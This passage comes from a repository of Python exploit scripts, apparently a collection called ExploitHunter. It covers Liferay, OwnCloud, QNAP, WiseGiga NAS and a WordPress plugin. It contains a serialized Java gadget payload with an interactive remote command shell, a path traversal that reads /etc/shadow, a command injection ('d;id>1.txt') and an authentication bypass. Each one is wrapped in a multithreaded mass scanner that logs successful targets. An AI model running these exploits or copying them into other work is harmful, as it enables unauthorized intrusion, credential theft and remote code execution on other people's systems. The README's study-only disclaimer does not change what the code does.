31 |         match = re.search(pattern, resp.content.decode('utf-8'), re.S | re.I)
32 |         if match:
33 |             result = match.group(1)
34 |             result = result.strip()
35 |             with open(success_file, 'a') as s_file:
36 |                 s_file.write(f"++++++++++++++++++\n")
37 |                 s_file.write(f"目标URL: {url}\n")
38 |                 s_file.write(f"Payload: whoami\n")
39 |                 s_file.write(f"响应内容:\n{result}\n\n")
40 |             return True
41 |     except Exception as e:
42 |         print(f"发生异常：{e}")
43 |     return False
44 | 
45 | def scan_targets(targets, proxies={}, success_file=None):
46 |     for target in targets:
47 |         target = target.strip()
48 |         check_for_vulnerability(target, proxies, success_file)
49 | 
50 | if __name__ == '__main__':
51 |     parser = argparse.ArgumentParser(description="Liferay Portal JSONS反序列化漏洞 CVE-2020-7961")
52 |     parser.add_argument("-u", "--url", help="目标URL")
53 |     parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表，默认为url.txt")
54 |     args = parser.parse_args()
55 | 
56 |     if not args.url and not args.file:
57 |         print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
58 |         exit(1)
59 | 
60 |     if args.url:
61 |         urls = [args.url]
62 |     elif args.file:
63 |         with open(args.file, 'r') as file:
64 |             urls = file.readlines()
65 | 
66 |     proxies = {}
67 |     success_file = 'success_targets.txt'
68 | 
69 |     for url in urls:
70 |         url = url.strip()
71 |         if not url.startswith("http://") and not url.startswith("https://"):
72 |             scan_targets(["http://" + url, "https://" + url], proxies, success_file)
73 |         else:
74 |             scan_targets([url], proxies, success_file)
75 | 
76 |     print("扫描完成，成功的目标已保存到 success_targets.txt 文件中。")
77 | 


--------------------------------------------------------------------------------
/Liferay_CVE-2020-7961_Exploit_v4.py:
--------------------------------------------------------------------------------
 1 | # 作者: VulnExpo
 2 | # 日期: 2023-10-9
 3 | 
 4 | import sys
 5 | import argparse
 6 | import requests
 7 | import time
 8 | import json
 9 | import re
10 | from urllib.parse import urlparse
11 | import random
12 | 
13 | requests.packages.urllib3.disable_warnings()
14 | 
15 | def check_for_vulnerability(url, cmd, interactive=False, proxies={}, success_file=None):
16 |     try:
17 |         payload = 'ACED0005737200176A6176612E7574696C2E5072696F72697479517565756594DA30B4FB3F82B103000249000473697A654C000A636F6D70617261746F727400164C6A6176612F7574696C2F436F6D70617261746F723B7870000000027372002B6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E436F6D70617261746F72E3A188EA7322A4480200024C000A636F6D70617261746F7271007E00014C000870726F70657274797400124C6A6176612F6C616E672F537472696E673B78707372003F6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E636F6D70617261746F72732E436F6D70617261626C65436F6D70617261746F72FBF49925B86EB13702000078707400106F757470757450726F706572746965737704000000037372003A636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000649000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465785B000A5F62797465636F6465737400035B5B425B00065F636C6173737400125B4C6A6176612F6C616E672F436C6173733B4C00055F6E616D6571007E00044C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF757200035B5B424BFD19156767DB37020000787000000001757200025B42ACF317F8060854E0020000787000001103CAFEBABE0000003100DD0A0036006C0A006D006E0A006F00700700710800720A007300740A007500760A007500770700780800790A0009007A08007B07007C0A000D006C08007D0A007E007F0A008000810800820A008000830800840B0085008608008708008808008907008A0A0019008B0A0019008C0A0019008D07008E07008F0A009000910A001E00920A001D00930700940A0022006C0A001D00950A002200960800970700980A0027006C0800990A0027009A0A0022009B0A0027009B0A0009009C0A009D009E08009F0A008000A00A00A100A20A00A100A30700A40A003300A50700A60700A70100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010004636D64730100104C6A6176612F7574696C2F4C6973743B01000769734C696E75780100015A0100056F735479700100124C6A6176612F6C616E672F537472696E673B01000E70726F636573734275696C64657201001A4C6A6176612F6C616E672F50726F636573734275696C6465723B01000470726F630100134C6A6176612F6C616E672F50726F636573733B01000262720100184C6A6176612F696F2F42756666657265645265616465723B01000273620100184C6A6176612F6C616E672F537472696E674275666665723B0100046C696E65010006726573756C74010008726573706F6E73650100284C6F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F526573706F6E73653B01000C6F757470757453747265616D0100234C6A617661782F736572766C65742F536572766C65744F757470757453747265616D3B01000E73657276696365436F6E746578740100324C636F6D2F6C6966657261792F706F7274616C2F6B65726E656C2F736572766963652F53657276696365436F6E746578743B0100037265710100274C6A617661782F736572766C65742F687474702F48747470536572766C6574526571756573743B0100097265715F6669656C640100194C6A6176612F6C616E672F7265666C6563742F4669656C643B01000B63757272656E745F7265710100274C6F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F526571756573743B010003636D6401000265780100154C6A6176612F6C616E672F457863657074696F6E3B010004746869730100124C7061796C6F61642F63625F74656D706C3B0100164C6F63616C5661726961626C65547970655461626C650100244C6A6176612F7574696C2F4C6973743C4C6A6176612F6C616E672F537472696E673B3E3B01000A457863657074696F6E730100097472616E73666F726D0100A6284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B2956010008646F63756D656E7401002D4C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B0100086974657261746F720100354C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B01000768616E646C65720100414C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B010072284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B5B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B29560100425B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A536F7572636546696C6501000D63625F74656D706C2E6A6176610C003700380700A80C00A900AA0700AB0C00AC00AD01002B6F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F52657175657374466163616465010007726571756573740700AE0C00AF00B00700B10C00B200B30C00B400B50100256F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F526571756573740100026A6B0C00B600B70100000100136A6176612F7574696C2F41727261794C6973740100076F732E6E616D650700B80C00B900B70700BA0C00BB00BC01000377696E0C00BD00BE010007636D642E6578650700BF0C00C000C10100022F630100092F62696E2F626173680100022D630100186A6176612F6C616E672F50726F636573734275696C6465720C003700C20C00C300C40C00C500C60100166A6176612F696F2F42756666657265645265616465720100196A6176612F696F2F496E70757453747265616D5265616465720700C70C00C800C90C003700CA0C003700CB0100166A6176612F6C616E672F537472696E674275666665720C00CC00BC0C00CD00CE0100010A0100176A6176612F6C616E672F537472696E674275696C6465720100037E7E7E0C00CD00CF0C00D000BC0C00D100D20700D30C00D400D50100057574662D380C00D600D70700D80C00D900DA0C00DB00380100136A6176612F6C616E672F457863657074696F6E0C00DC00380100107061796C6F61642F63625F74656D706C010040636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F41627374726163745472616E736C657401003B636F6D2F6C6966657261792F706F7274616C2F6B65726E656C2F736572766963652F53657276696365436F6E746578745468726561644C6F63616C01001167657453657276696365436F6E7465787401003428294C636F6D2F6C6966657261792F706F7274616C2F6B65726E656C2F736572766963652F53657276696365436F6E746578743B010030636F6D2F6C6966657261792F706F7274616C2F6B65726E656C2F736572766963652F53657276696365436F6E7465787401000A6765745265717565737401002928294C6A617661782F736572766C65742F687474702F48747470536572766C6574526571756573743B01000F6A6176612F6C616E672F436C6173730100106765744465636C617265644669656C6401002D284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F7265666C6563742F4669656C643B0100176A6176612F6C616E672F7265666C6563742F4669656C6401000D73657441636365737369626C65010004285A2956010003676574010026284C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B010009676574486561646572010026284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E673B0100106A6176612F6C616E672F53797374656D01000B67657450726F70657274790100106A6176612F6C616E672F537472696E6701000B746F4C6F7765724361736501001428294C6A6176612F6C616E672F537472696E673B010008636F6E7461696E7301001B284C6A6176612F6C616E672F4368617253657175656E63653B295A01000E6A6176612F7574696C2F4C697374010003616464010015284C6A6176612F6C616E672F4F626A6563743B295A010013284C6A6176612F7574696C2F4C6973743B295601001372656469726563744572726F7253747265616D01001D285A294C6A6176612F6C616E672F50726F636573734275696C6465723B010005737461727401001528294C6A6176612F6C616E672F50726F636573733B0100116A6176612F6C616E672F50726F6365737301000E676574496E70757453747265616D01001728294C6A6176612F696F2F496E70757453747265616D3B010018284C6A6176612F696F2F496E70757453747265616D3B2956010013284C6A6176612F696F2F5265616465723B2956010008726561644C696E65010006617070656E6401002C284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E674275666665723B01002D284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E674275696C6465723B010008746F537472696E6701000B676574526573706F6E736501002A28294C6F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F526573706F6E73653B0100266F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F526573706F6E736501000F6765744F757470757453747265616D01002528294C6A617661782F736572766C65742F536572766C65744F757470757453747265616D3B0100086765744279746573010016284C6A6176612F6C616E672F537472696E673B295B420100216A617661782F736572766C65742F536572766C65744F757470757453747265616D0100057772697465010005285B422956010005636C6F736501000F7072696E74537461636B547261636500210035003600000000000300010037003800020039000002B7000500110000013D2AB70001B800024C2BB600034D12041205B600064E2D04B600072D2CB60008C000093A041904120AB6000B3A051905C601051905120CA500FEBB000D59B7000E3A06043607120FB800103A081908C600131908B600111212B6001399000603360715079A002419061214B9001502005719061216B9001502005719061905B90015020057A7002119061217B9001502005719061218B9001502005719061905B90015020057BB0019591906B7001A3A09190904B6001B571909B6001C3A0ABB001D59BB001E59190AB6001FB70020B700213A0BBB002259B700233A0C190BB60024593A0DC60013190C190DB600251226B6002557A7FFE8BB002759B700281229B6002A190CB6002BB6002A1229B6002AB6002C3A0E1904B6002D3A0F190FB6002E3A101910190E122FB60030B600311910B60032A700084C2BB60034B1000100040134013700330003003A0000009200240000001A0004001C0008001D000D001E0015001F001A002000240022002D0023003900240042002500450026004C0027005E00280061002A0066002B0070002C007A002D0087002F00910030009B003100A5003400B0003500B7003600BE003800D3003900DC003C00E7003D00F7004001150041011C004201230043012F00440134004A0137004801380049013C004B003B000000B60012004200F2003C003D0006004500EF003E003F0007004C00E800400041000800B0008400420043000900BE007600440045000A00D3006100460047000B00DC005800480049000C00E40050004A0041000D0115001F004B0041000E011C0018004C004D000F01230011004E004F00100008012C005000510001000D01270052005300020015011F00540055000300240110005600570004002D0107005800410005013800040059005A00010000013D005B005C0000005D0000000C0001004200F2003C005E0006005F000000040001003300010060006100010039000000490000000400000001B100000002003A0000000600010000004E003B0000002A000400000001005B005C0000000000010062006300010000000100640065000200000001006600670003000100600068000100390000003F0000000300000001B100000002003A00000006000100000051003B00000020000300000001005B005C000000000001006200630001000000010066006900020001006A00000002006B70740006747231706C65707701007871007E000D78'
18 |         post_data = (
19 |             'cmd={"/expandocolumn/update-column":{}}&p_auth=test&formDate=2020&columnId=1&name=1&type=1&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:'+payload+';"}'
20 |         )
21 |         headers = {
22 |             'Content-Type': 'application/x-www-form-urlencoded',
23 |             "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36",
24 |             "jk": cmd
25 |         }
26 |         api_url = '{url}/api/jsonws/invoke'.format(url=url)
27 |         resp = requests.post(url=api_url, data=post_data, headers=headers, timeout=60, verify=False, allow_redirects=False)
28 |         pattern = '~~~(.*?)~~~'
29 |         match = re.search(pattern, resp.content.decode('utf-8'), re.S | re.I)
30 |         if match:
31 |             result = match.group(1)
32 |             result = result.strip()
33 |             with open(success_file, 'a') as s_file:
34 |                 s_file.write(f"++++++++++++++++++\n")
35 |                 s_file.write(f"目标URL: {url}\n")
36 |                 s_file.write(f"Payload: {cmd}\n")
37 |                 s_file.write(f"响应内容:\n{result}\n\n")
38 | 
39 |             if interactive:
40 |                 print(f"目标URL: {url}")
41 |                 print(f"Payload: {cmd}")
42 |                 print(f"响应内容:\n{result}\n")
43 |                 while True:
44 |                     user_input = input("请输入要执行的命令或输入'exit'退出: ")
45 |                     if user_input == 'exit':
46 |                         break
47 |                     interactive_cmd = user_input.strip()
48 |                     interactive_result = check_for_vulnerability(url, interactive_cmd, False, proxies, success_file)
49 |                     if interactive_result:
50 |                         print(f"响应内容:\n{interactive_result}\n")
51 | 
52 |             return result  # 返回结果字符串
53 |     except Exception as e:
54 |         print(f"发生异常：{e}")
55 |     return None
56 | 
57 | def scan_targets(targets, cmd, interactive=False, proxies={}, success_file=None):
58 |     for target in targets:
59 |         target = target.strip()
60 |         check_for_vulnerability(target, cmd, interactive, proxies, success_file)
61 | 
62 | if __name__ == '__main__':
63 |     parser = argparse.ArgumentParser(description="Liferay Portal JSONS反序列化漏洞CVE-2020-7961")
64 |     parser.add_argument("-u", "--url", help="目标URL")
65 |     parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表，默认为url.txt")
66 |     parser.add_argument("-c", "--cmd", help="要执行的命令")
67 |     parser.add_argument("-i", "--interactive", action="store_true", help="启用交互式Shell模式")
68 |     args = parser.parse_args()
69 | 
70 |     if not args.url and not args.file:
71 |         print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
72 |         exit(1)
73 | 
74 |     if args.url:
75 |         urls = [args.url]
76 |     elif args.file:
77 |         with open(args.file, 'r') as file:
78 |             urls = file.readlines()
79 | 
80 |     proxies = {}
81 |     success_file = 'success_targets.txt'
82 | 
83 |     for url in urls:
84 |         url = url.strip()
85 |         if not url.startswith("http://") and not url.startswith("https://"):
86 |             scan_targets(["http://" + url, "https://" + url], args.cmd, args.interactive, proxies, success_file)
87 |         else:
88 |             scan_targets([url], args.cmd, args.interactive, proxies, success_file)
89 | 
90 |     print("扫描完成，成功的目标已保存到 success_targets.txt 文件中。")
91 | 


--------------------------------------------------------------------------------
/OwnCloud_CVE-2023-49105_Exploit.py:
--------------------------------------------------------------------------------
 1 | # 作者: VulnExpo
 2 | # 日期: 2023-12-05
 3 | import requests
 4 | import argparse
 5 | import threading
 6 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
 7 | 
 8 | def check_phpinfo(url, success_file=None):
 9 | 	try:
10 | 		response = requests.get(url, verify=False)  # Bypass SSL verification
11 | 		if response.status_code == 200 and 'OWNCLOUD_ADMIN_' in response.text:
12 | 			return response.text
13 | 	except Exception as e:
14 | 		pass
15 | 	return False
16 | 
17 | def check_for_vulnerability(url, proxies=None, success_file=None):
18 | 	try:
19 | 		url_variant1 = url + "/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.css"
20 | 		url_variant2 = url + "/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.css"
21 | 
22 | 		response_text = check_phpinfo(url_variant1) or check_phpinfo(url_variant2)
23 | 		if response_text:
24 | 			print(f"目标URL: {url} ")
25 | 			with open(success_file, 'a') as s_file:
26 | 				s_file.write(f"++++++++++++++++++\n")
27 | 				s_file.write(f"目标URL: {url}\n")
28 | 				s_file.write(f"响应内容: {response_text}\n\n")
29 | 			return True
30 | 		else:
31 | 			return False
32 | 	except Exception as e:
33 | 		print(f"发生异常：{e}")
34 | 		return False
35 | 
36 | def scan_targets(targets, proxies=None, success_file=None):
37 | 	for target in targets:
38 | 		target = target.strip()
39 | 		check_for_vulnerability(target, proxies, success_file)
40 | 
41 | def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
42 | 	threads = []
43 | 
44 | 	for i in range(num_threads):
45 | 		thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file))
46 | 		threads.append(thread)
47 | 
48 | 	for thread in threads:
49 | 		thread.start()
50 | 
51 | 	for thread in threads:
52 | 		thread.join()
53 | 
54 | if __name__ == '__main__':
55 | 	parser = argparse.ArgumentParser(description="OwnCloud 敏感信息泄漏漏洞CVE-2023-49103")
56 | 	parser.add_argument("-u", "--url", help="目标URL")
57 | 	parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表，默认为url.txt")
58 | 	parser.add_argument("-t", "--threads", type=int, default=4, help="线程数，默认为4")
59 | 	parser.add_argument("-p", "--proxy", help="代理服务器地址（例如：http://localhost:8080）")
60 | 	args = parser.parse_args()
61 | 
62 | 	if not args.url and not args.file:
63 | 		print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
64 | 		exit(1)
65 | 
66 | 	if args.url:
67 | 		urls = [args.url]
68 | 	elif args.file:
69 | 		with open(args.file, 'r') as file:
70 | 			urls = file.readlines()
71 | 
72 | 	success_file = 'success_targets.txt'
73 | 
74 | 	proxies = {
75 | 		"http": args.proxy,
76 | 		"https": args.proxy
77 | 	} if args.proxy else None
78 | 
79 | 	multi_threaded_scan(urls, proxies, success_file, args.threads)
80 | 
81 | 	print("扫描完成，成功的目标已保存到 success_targets.txt 文件中。")
82 | 


--------------------------------------------------------------------------------
/QNAP-NAS_CVE-2024-21889_Exploit.py:
--------------------------------------------------------------------------------
 1 | # 作者: VulnExpo
 2 | # 日期: 2024-03-20
 3 | 
 4 | import requests
 5 | import argparse
 6 | import threading
 7 | import httplib2
 8 | import random
 9 | import re
10 | import string
11 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
12 | 
13 | def check_for_vulnerability(url, proxies=None, success_file=None):
14 | 	data="wiz_func=start_2sv&action=none&user=guest&pwd=none"
15 | 
16 | 	headers = {'User-Agent': 'curl/8.6.0', 'Accept': '*/*', 'Content-Type': 'application/x-www-form-urlencoded'}
17 | 
18 | 	try:
19 | 		response = requests.post(url+"/cgi-bin/priv/privWizard.cgi",data=data,verify=False, timeout=5,headers=headers)
20 | 		if response.status_code==200 and "<version>" in response.text:
21 | 			print(f"目标URL: {url}")
22 | 			with open(success_file, 'a') as s_file:
23 | 				s_file.write(f"++++++++++++++++++\n")
24 | 				s_file.write(f"目标URL: {url}\n")
25 | 				s_file.write(f"响应内容: {response.text}\n\n")
26 | 			return True
27 | 	except Exception as e:
28 | 		print(f"发生异常：{e}")
29 | 		return False
30 | 
31 | def scan_targets(targets, proxies=None, success_file=None):
32 | 	for target in targets:
33 | 		target = target.strip()
34 | 		check_for_vulnerability(target, proxies, success_file)
35 | 
36 | def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
37 | 	threads = []
38 | 
39 | 	for i in range(num_threads):
40 | 		thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file))
41 | 		threads.append(thread)
42 | 
43 | 	for thread in threads:
44 | 		thread.start()
45 | 
46 | 	for thread in threads:
47 | 		thread.join()
48 | 
49 | if __name__ == '__main__':
50 | 	parser = argparse.ArgumentParser(description="QNAP NAS身份验证缺失漏洞CVE-2024-21899")
51 | 	parser.add_argument("-u", "--url", help="目标URL")
52 | 	parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表，默认为url.txt")
53 | 	parser.add_argument("-t", "--threads", type=int, default=4, help="线程数，默认为4")
54 | 	parser.add_argument("-p", "--proxy", help="代理服务器地址（例如：http://localhost:8080）")
55 | 	args = parser.parse_args()
56 | 
57 | 	if not args.url and not args.file:
58 | 		print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
59 | 		exit(1)
60 | 
61 | 	if args.url:
62 | 		urls = [args.url]
63 | 	elif args.file:
64 | 		with open(args.file, 'r') as file:
65 | 			urls = file.readlines()
66 | 
67 | 	success_file = 'success_targets.txt'
68 | 
69 | 	proxies = {
70 | 		"http": args.proxy,
71 | 		"https": args.proxy
72 | 	} if args.proxy else None
73 | 
74 | 	multi_threaded_scan(urls, proxies, success_file, args.threads)
75 | 
76 | 	print("扫描完成，成功的目标已保存到 success_targets.txt 文件中。")
77 | 


--------------------------------------------------------------------------------
/QNAP_CVE-2019-7192_Exploit.py:
--------------------------------------------------------------------------------
  1 | # 作者: VulnExpo
  2 | # 日期: 2023-12-22
  3 | 
  4 | import requests
  5 | import argparse
  6 | import threading
  7 | import re
  8 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
  9 | 
 10 | def check_for_vulnerability(url, proxies=None, success_file=None):
 11 | 	try:
 12 | 		headers = {
 13 | 		"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0",
 14 | 		"Accept": "text/html,application/xhtml+xml,appication/xml;q=0.9,*/*;q=0.8",
 15 | 		"Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
 16 | 		"Accept-Encoding":"gzip, deflate",
 17 | 		"Connection":"close",
 18 | 		"Upgrade-Insecure-Requests":"1",
 19 | 		"Pragma":"no-cache",
 20 | 		"Cache-Control":"no-cache",
 21 | 		"Content-Type":"application/x-www-form-urlencoded"
 22 | 		}
 23 | 
 24 | 		req = requests.Session()
 25 | 
 26 | 		# search album_id
 27 | 
 28 | 		print("="*65)
 29 | 		post_data = {'a': 'setSlideshow', 'f': 'qsamplealbum'}
 30 | 		album_id_response = req.post(url + "/photo/p/api/album.php", data=post_data, headers=headers, verify=False, timeout=10)
 31 | 
 32 | 		if album_id_response.status_code != 200:
 33 | 			print("album id not found \n\033[91mnot vulnerable\033[0m")
 34 | 			return False
 35 | 
 36 | 		album_id = re.search('(?<=<output>).*?(?=</output>)', album_id_response.text).group()
 37 | 
 38 | 		# search $_SESSION['access_code']
 39 | 
 40 | 		access_code_response = req.get(url + "/photo/slideshow.php?album=" + album_id, headers=headers, verify=False, timeout=10)
 41 | 		if access_code_response.status_code != 200:
 42 | 			print("slideshow not found \n\033[91mnot vulnerable\033[0m")
 43 | 			return False
 44 | 
 45 | 		access_code = re.search("(?<=encodeURIComponent\\(').*?(?=')", access_code_response.text).group()
 46 | 
 47 | 		def get_file_content(file):
 48 | 			post_data = {'album': album_id, 'a': 'caption', 'ac': access_code, 'f': 'UMGObv', 'filename': file}
 49 | 			file_read_response = req.post(url + "/photo/p/api/video.php", data=post_data, headers=headers, verify=False, timeout=10)
 50 | 			print(f"目标URL: {url}, 响应内容: {file_read_response.text}")
 51 | 			with open(success_file, 'a') as s_file:
 52 | 				s_file.write("=" * 65 + "\n")
 53 | 				s_file.write(f"目标URL: {url}\n")
 54 | 				s_file.write(f"响应内容: {file_read_response.text}\n\n")
 55 | 
 56 | 		# get_file_content('./../../../../../etc/hostname')
 57 | 		get_file_content('./../../../../../etc/shadow')
 58 | 
 59 | 	except Exception as e:
 60 | 		print(f"发生异常：{e}")
 61 | 		return False
 62 | 
 63 | def scan_targets(targets, proxies=None, success_file=None):
 64 | 	for target in targets:
 65 | 		target = target.strip()
 66 | 		check_for_vulnerability(target, proxies, success_file)
 67 | 
 68 | def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
 69 | 	threads = []
 70 | 
 71 | 	for i in range(num_threads):
 72 | 		thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file))
 73 | 		threads.append(thread)
 74 | 
 75 | 	for thread in threads:
 76 | 		thread.start()
 77 | 
 78 | 	for thread in threads:
 79 | 		thread.join()
 80 | 
 81 | if __name__ == '__main__':
 82 | 	parser = argparse.ArgumentParser(description="QNAP Photo Station远程代码执行漏洞CVE-2019-7192")
 83 | 	parser.add_argument("-u", "--url", help="目标URL")
 84 | 	parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表，默认为url.txt")
 85 | 	parser.add_argument("-t", "--threads", type=int, default=4, help="线程数，默认为4")
 86 | 	parser.add_argument("-p", "--proxy", help="代理服务器地址（例如：http://localhost:8080）")
 87 | 	args = parser.parse_args()
 88 | 
 89 | 	if not args.url and not args.file:
 90 | 		print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
 91 | 		exit(1)
 92 | 
 93 | 	if args.url:
 94 | 		urls = [args.url]
 95 | 	elif args.file:
 96 | 		with open(args.file, 'r') as file:
 97 | 			urls = file.readlines()
 98 | 
 99 | 	success_file = 'success_targets.txt'
100 | 
101 | 	proxies = {
102 | 		"http": args.proxy,
103 | 		"https": args.proxy
104 | 	} if args.proxy else None
105 | 
106 | 	multi_threaded_scan(urls, proxies, success_file, args.threads)
107 | 
108 | 	print("扫描完成，成功的目标已保存到 success_targets.txt 文件中。")
109 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # ExploitHunter
 2 | **【免责声明】**<br>
 3 | 
 4 | 本项目所涉及的技术、思路和工具仅供学习，任何人不得将其用于非法用途和盈利，不得将其用于非授权渗透测试，否则后果自行承担，与本项目无关。
 5 | 
 6 | **【最近更新】**
 7 | 
 8 | 
 9 | - 2024-03-20 
10 |     -  QNAP NAS身份验证缺失漏洞CVE-2024-21899
11 | 
12 | - 2024-01-22
13 |     -  Atlassian Confluence 模板注入代码执行漏洞CVE-2023-22527
14 | 
15 | - 2023.12.30
16 |     - Apache OFBiz groovy 远程代码执行漏洞CVE-2023-51467
17 | 
18 | - 2023.12.04
19 |     - Apache OFBiz XML-RPC代码执行漏洞CVE-2023-49070
20 | 
21 | 
22 | 
23 | 


--------------------------------------------------------------------------------
/WiseGigaNAS_rce_exploit.py:
--------------------------------------------------------------------------------
 1 | # 作者: VulnExpo
 2 | # 日期: 2023-11-17
 3 | 
 4 | import requests
 5 | import argparse
 6 | import threading
 7 | import httplib2
 8 | import random
 9 | import re
10 | import string
11 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
12 | 
13 | def check_for_vulnerability(url, proxies=None, success_file=None):
14 | 	try:
15 | 		headers = {
16 | 			'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36',
17 | 		}
18 | 		paths = ['/admin/group.php?memberid=root&cmd=add&group_name=d;id>1.txt', '/admin/1.txt']
19 | 
20 | 		for path in paths:
21 | 			target_url = url + path
22 | 			response = requests.get(target_url, headers=headers, timeout=10, verify=False)
23 | 
24 | 			if response.status_code == 200 and "window.open" in response.text:
25 | 				response2 = requests.get(url + paths[1], headers=headers, timeout=10, verify=False)
26 | 				if response2.status_code == 200 and "uid=" in response2.text:
27 | 					print(f"目标URL: {url}")
28 | 					with open(success_file, 'a') as s_file:
29 | 						s_file.write(f"++++++++++++++++++\n")
30 | 						s_file.write(f"目标URL: {url}\n")
31 | 						s_file.write(f"响应内容: {response2.text}\n\n")
32 | 					return True
33 | 
34 | 	except Exception as e:
35 | 		print(f"发生异常：{e}")
36 | 
37 | 	return False
38 | 
39 | def scan_targets(targets, proxies=None, success_file=None):
40 | 	for target in targets:
41 | 		target = target.strip()
42 | 		check_for_vulnerability(target, proxies, success_file)
43 | 
44 | def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
45 | 	threads = []
46 | 
47 | 	for i in range(num_threads):
48 | 		thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file))
49 | 		threads.append(thread)
50 | 
51 | 	for thread in threads:
52 | 		thread.start()
53 | 
54 | 	for thread in threads:
55 | 		thread.join()
56 | 
57 | if __name__ == '__main__':
58 | 	parser = argparse.ArgumentParser(description="WiseGiga NAS远程命令执行漏洞")
59 | 	parser.add_argument("-u", "--url", help="目标URL")
60 | 	parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表，默认为url.txt")
61 | 	parser.add_argument("-t", "--threads", type=int, default=4, help="线程数，默认为4")
62 | 	parser.add_argument("-p", "--proxy", help="代理服务器地址（例如：http://localhost:8080）")
63 | 	args = parser.parse_args()
64 | 
65 | 	if not args.url and not args.file:
66 | 		print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
67 | 		exit(1)
68 | 
69 | 	if args.url:
70 | 		urls = [args.url]
71 | 	elif args.file:
72 | 		with open(args.file, 'r') as file:
73 | 			urls = file.readlines()
74 | 
75 | 	success_file = 'success_targets.txt'
76 | 
77 | 	proxies = {
78 | 		"http": args.proxy,
79 | 		"https": args.proxy
80 | 	} if args.proxy else None
81 | 
82 | 	multi_threaded_scan(urls, proxies, success_file, args.threads)
83 | 
84 | 	print("扫描完成，成功的目标已保存到 success_targets.txt 文件中。")
85 | 


--------------------------------------------------------------------------------
/WordPress_plugin_SupportCandy_CVE-2023-1730_exploit.py:
--------------------------------------------------------------------------------
 1 | # 作者: VulnExpo
 2 | # 日期: 2023-11-16
 3 | 
 4 | import requests
 5 | import argparse
 6 | import threading
 7 | import time
 8 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
 9 | 
10 | def check_for_vulnerability(url, proxies=None, success_file=None):
11 | 	try:
